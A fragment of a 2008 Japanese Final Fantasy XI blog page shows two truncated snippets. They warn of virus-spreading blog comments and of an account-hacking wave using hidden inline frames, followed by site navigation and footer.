    ウィルス感染させられる怪しいブログコメントについては先日触れましたが、どうやら他にも大変なことが起きていたらしい。 ブログを見ただ...
    URL 2008/03/14(Fri)22:45:21
    アカウントハックにご注意を
    最近、またしても『FF11』のアカウントハックが流行りだしているらしい。 今度はインラインフレームを利用したもので、管理者本人も気づかな...
    URL 2008/03/19(Wed)21:30:09
    侍上げ【33〜34】 HOME 侍上げ【32〜33】
    Copyright © FF11 ペット狩り黒猫奮闘記 All Rights Reserved
    Powered by ニンジャブログ  Designed by ピンキー・ローン・ピッグ
    忍者ブログ / [PR]